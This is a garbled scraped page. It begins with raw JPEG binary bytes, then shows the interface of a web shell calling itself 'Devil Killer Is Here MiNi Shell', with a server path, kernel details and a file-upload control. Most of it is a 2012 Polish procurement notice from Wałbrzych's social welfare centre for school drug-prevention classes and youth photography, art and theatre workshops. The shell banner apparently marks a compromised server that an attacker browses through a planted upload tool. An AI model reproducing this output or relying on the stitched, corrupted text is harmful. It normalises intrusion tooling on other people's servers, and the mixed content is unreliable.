JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/92319-N-2012.html

<p class="kh_header"><b>Wałbrzych: Opracowanie i  organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli, prowadzenie warsztatów fotograficzno - dziennikarskich, plastycznych z elementami projektowania wnętrz oraz teatralnych.</b><br>
<b>Numer ogłoszenia: 92319 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.walbrzych.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> mops.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i  organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli, prowadzenie warsztatów fotograficzno - dziennikarskich, plastycznych z elementami projektowania wnętrz oraz teatralnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Podzadanie nr 1 - Opracowanie i organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli. 
a)	Celem przedmiotowej usługi jest opracowanie i organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii, dla młodzieży, rodziców i nauczycieli wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych.
b)	Łączna ilość godzin w  programie winna wynosić 324 godziny zegarowe, z podziałem na każdą placówkę:
-	12 godzin zegarowych - zajęcia dla uczniów,
-	3 godziny zegarowe - zajęcia dla grona pedagogicznego,
-	3 godziny zegarowe - zajęcia dla rodziców.
c)	Programem objęte będą szkoły z terenu Gminy Wałbrzych:
-	10 szkół gimnazjalnych,
-	8 szkół średnich. 
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
e)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć
f)	Wykonawca jest zobowiązany do nawiązania współpracy z dyrektorami wszystkich wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych, ustalenia szczegółowego harmonogramu szkoleń i planu pracy. Wykonawca przedstawi przedmiotowy plan pracy Zamawiającemu przed rozpoczęciem wykonywania usługi.    
g)	Miejsce: usługa będzie realizowana w siedzibach wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych.
h)	Zajęcia kierowane do uczniów powinny uwzględniać w swej tematyce zagadnienia związane z profilaktyką uzależnień od narkotyków, w tym: edukację z zakresu uzależnień i szkód związanych z uzależnieniem, dostarczenie wiedzy na temat skutecznych i bezpiecznych form pomocy dla osób mających problem z używaniem i uzależnieniem od środków odurzających, naukę radzenia sobie z problemami przy wykorzystaniu własnych zasobów.
i)	Zajęcia kierowane do nauczycieli i rodziców powinny uwzględniać w swej tematyce edukację z zakresu uzależnień, sposobów interweniowania wobec osoby uzależnionej i sięgającej po środki psychoaktywne, naukę rozpoznawania sygnałów świadczących o zażywaniu substancji psychoaktywnych i sposobów interwencji wobec takiej osoby, zwiększenie świadomości dotyczącej zjawiska uzależnień wśród młodzieży. 
j)	Wykonawca będzie zobowiązany do dostarczenia listy z podpisami uczestników szkolenia oraz wykaz przepracowanych godzin, potwierdzonych przez dyrektora danej placówki oświatowej. Ponadto Wykonawca raz w miesiącu przygotuje sprawozdanie z wykonanego zadania.
2)	Podzadanie nr 2 - Prowadzenie warsztatów fotograficzno - dziennikarskich dla Klubu Młodzieżowego w ramach Projektu Centrum Aktywności Lokalnej: 
a)	Grupa docelowa - około 12 osób - młodzież w wieku od 13 lat.
b)	Całkowity czas trwania - 50 h (zajęcia będą odbywały się 2 razy w tygodniu po 3 h, przy czym ostatnie zajęcia będą trwać 2 h), w  podziale:
-	40 h - zajęcia praktyczne - zajęcia fotograficzne plenerowe, połączone z wycieczkami po wałbrzyskim Śródmieściu,
-	10 h - zajęcia teoretyczne - dotyczące fotografii i dziennikarstwa.
c)	Miejsce zajęć - Centrum Aktywności Lokalnej, ul. Mickiewicza 26, 58 - 300 Wałbrzych oraz zajęcia plenerowe na terenie wałbrzyskiego Śródmieścia.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia. 
e)	Cel - podstawowym celem jest rozwijanie zainteresowań, podniesienie motywacji do działania. Podczas warsztatów beneficjenci będą mieli okazję poznać od strony teoretycznej i praktycznej sztukę fotografii. Warsztaty mają na celu zainteresowanie młodzieży różnymi formami spędzania wolnego czasu, pobudzenie do samorozwoju, poszukiwania własnych talentów i pasji, pomoc w rozwijaniu i pobudzaniu wrażliwości oraz zachęcanie do własnych dziennikarskich i fotograficznych poszukiwań. 
f)	Główne założenia - rozwijanie twórczego myślenia, wrażliwości i wyobraźni, dostarczanie emocji, wzbogacanie przeżyć, wzrost pewności siebie, umiejętność współpracy w grupie oraz integracja. 
g)	Tematyka - fotografia cyfrowa i analogowa, techniki fotografowania, podstawy komputerowej obróbki obrazu, kompozycja obrazów - samodzielna fotografia, wykonywanie zdjęć różnymi technikami. Podczas zajęć beneficjenci nauczą się podstawowych technik fotografii i zdobędą podstawy warsztatu dziennikarskiego. Jednym z tematów zajęć winna być fotografia portretowa. Beneficjenci wcielą się wówczas zarówno w fotografów jaki i modeli, poznając w ten sposób fotografowanie z obu stron. Kolejnym tematem zajęć winna być rewitalizacja wałbrzyskiego Śródmieścia, widziana oczami młodych. Beneficjenci winni fotografować i opisywać zmiany w Śródmieściu.      
h)	Po zakończeniu zajęć, Wykonawca przygotuje albumy ze zdjęciami wykonanymi w trakcie zajęć. Albumy w ilości 13 szt. dla zamawiającego oraz 1 szt. dla każdego z beneficjentów, powinny zawierać minimum 30 zdjęć formatu 10x15 cm. Dodatkowo Wykonawca zapewni 10 zdjęć formatu 15x21 cm oprawionych w ramki.     
i)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć, m. in. aparaty cyfrowe dla każdego beneficjenta (na czas trwania zajęć).
j)	Wykonawca wykona i wyda certyfikaty potwierdzające ukończenie warsztatów pn. Warsztaty fotograficzno - dziennikarskie - zawierające zestawienie wszystkich działań zawartych w przedmiocie zamówienia (na odwrocie certyfikatu w formie tabelarycznej), z wyszczególnieniem informacji odnośnie ilości godzin teoretycznych i praktycznych, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez Wykonawcę. Wykonawca zobowiązany będzie do przekazania Zamawiającemu na 14 dni przed zakończeniem warsztatów, wzoru ww certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu warsztatów pn.: Warsztaty fotograficzno - dziennikarskie (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z   4 lutego 2009 r. Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego ww wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie ww dokumentu uczestnikom warsztatów.
k)	Zamawiający przygotuje szczegółowy harmonogram zajęć, najpóźniej do dnia podpisania umowy oraz będzie prowadził listy obecności.
3)	Podzadanie nr 3 - Prowadzenie warsztatów plastycznych z elementami projektowania wnętrz dla Klubu Młodzieżowego w ramach Projektu Centrum Aktywności Lokalnej:
a)	Grupa docelowa - około 12 osób - młodzież w wieku od 13 lat.
b)	Całkowity czas trwania - 50 h (zajęcia będą odbywały się 2 razy w tygodniu po 3 h, przy czym ostatnie zajęcia będą trwać 2 h)
c)	Miejsce zajęć - Centrum Aktywności Lokalnej, ul. Mickiewicza 26, 58 - 300 Wałbrzych oraz zajęcia plenerowe na terenie wałbrzyskiego Śródmieścia.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
e)	Cel - podstawowym celem jest rozwijanie zainteresowań, podniesienie motywacji do działania. Warsztaty mają na celu zainteresowanie młodzieży różnymi formami spędzania wolnego czasu, pobudzenie do samorozwoju, poszukiwania własnych talentów i pasji, pomoc w rozwijaniu i pobudzaniu wrażliwości. 
f)	Główne założenia - rozwijanie twórczego myślenia, wrażliwości i wyobraźni, dostarczanie emocji, wzbogacanie przeżyć, wzrost pewności siebie, umiejętność współpracy w grupie oraz integracja. 
g)	Tematyka - wiedza z zakresu malarstwa, rysunku i grafiki, praktyczne poznanie technik i technologii wykorzystywanych w twórczości plastycznej: rysunek ołówkiem, węglem, sepią, malarstwo akwarelowe, temperowe, akrylowe i olejne, grafika warsztatowa - wypukło druki - gipsoryt i linoryt. Tematyka prac to tematy studyjne martwa natura, pejzaż i postać oraz dowolne tematy wybrane przez uczestników. W trakcie warsztatów prowadzone będą również indywidualne korekty prac. Design we wnętrzu, kolory we wnętrzu (barwa, kontrast barw), oświetlenie we wnętrzu, elementy materiałoznawstwa, styl, charakter wnętrza, łącznie stylów we wnętrzu. 
h)	Na zakończenie zajęć Wykonawca zorganizuje wystawę prac powstałych podczas warsztatów w Centrum Aktywności Lokalnej.  
i)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć.
j)	Wykonawca wykona i wyda certyfikaty potwierdzające ukończenie warsztatów pn. Warsztaty plastyczne z elementami projektowania wnętrz - zawierające zestawienie wszystkich działań zawartych w przedmiocie zamówienia (na odwrocie certyfikatu w formie tabelarycznej), z wyszczególnieniem informacji odnośnie ilości godzin teoretycznych i praktycznych, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez Wykonawcę. Wykonawca zobowiązany będzie do przekazania Zamawiającemu na 14 dni przed zakończeniem warsztatów, wzoru ww certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu warsztatów pn.: Warsztaty plastyczne z elementami projektowania wnętrz (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r., Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego ww wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie ww dokumentu uczestnikom warsztatów.
k)	Zamawiający przygotuje szczegółowy harmonogram zajęć oraz będzie prowadził listy obecności.
4)	Podzadanie nr 4 - Prowadzenie warsztatów teatralnych dla Świetlicy Środowiskowej Śródmieście:
a)	Grupa docelowa - około 20 - 25 dzieci w grupie wiekowej 6 - 12 lat.
b)	Całkowity czas trwania - 12 h (zgodnie z harmonogramem, o którym mowa w pkt 3.4 lit.j) 
c)	Miejsce zajęć - teatr na terenie Wałbrzycha.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia
e)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć
f)	Tematyka i założenia - zwiększenie wiedzy o teatrze, scenografii, muzyce teatralnej, technikach scenicznych, poznawanie teatru poprzez zabawę. Zajęcia winny być prowadzone na terenie teatru, w pracowniach artystycznych, na scenie, prowadzone pod kierunkiem reżysera lub aktora. Zajęcia powinny obejmować przygotowanie inscenizacji wybranego utworu, następnie zachowując wszelkie stadia produkcji spektaklu teatralnego, w tym opracowanie tekstu z podziałem na role, projektowanie i wykonanie scenografii, wybór muzyki i piosenek, ustawienie świateł, opracowanie warsztatu aktorskiego, projektowanie plakatu, programu, zaproszenia itd. 
g)	Na zakończenie warsztatów Wykonawca wraz z beneficjentmi przygotuje na scenie teatru inscenizację, dla zaproszonej przez beneficjentów publiczności.
h)	Wykonawca przygotowuje certyfikat ukończenia zajęć.
i)	W ramach usługi Wykonawca zapewni transport dla beneficjentów i dwóch opiekunów na trasie z Centrum Aktywności Lokalnej przy ul. Mickiewicza 26 do swojej siedziby i z powrotem, bądź zapewni refundację kosztów dojazdu w postaci biletów komunikacji miejskiej.
j)	Zamawiający przygotuje harmonogram zajęć w terminie do dnia podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.52.10.00-2, 80.57.00.00-0, 85.00.00.00-9, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	W zakresie Podzadania Nr 1 Zamawiający uzna warunek za pełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na opracowaniu i organizacji programu profilaktycznego z zakresu przeciwdziałania narkomanii, dla młodzieży, rodziców i nauczycieli szkół gimnazjalnych i ponadgimnazjalnych. 
b)	W zakresie Podzadania Nr 2 Zamawiający uzna warunek za pełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na prowadzeniu warsztatów fotograficzno - dziennikarskich.
c)	W zakresie Podzadania Nr 3 Zamawiający uzna warunek za pełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na prowadzeniu warsztatów plastycznych.
d)	W zakresie Podzadania Nr 4 Zamawiający uzna warunek za pełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na prowadzeniu warsztatów teatralnych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o nie zaleganiu w opłacie obowiązkowych składek na ubezpieczenie społeczne oraz o nie zaleganiu w opłacie obowiązkowych podatków i opłat,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mops.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wałbrzychu
ul. Beethovena 1-2
58 - 300 Wałbrzych
pok. 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu
ul. Beethovena 1-2
58 - 300 Wałbrzych
pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w zakresie podzadania nr 2 i nr 3 jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet I - Zatrudnienie i integracja społeczna. Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Poddziałanie 1.17 Rewitalizacja społeczna..</p>
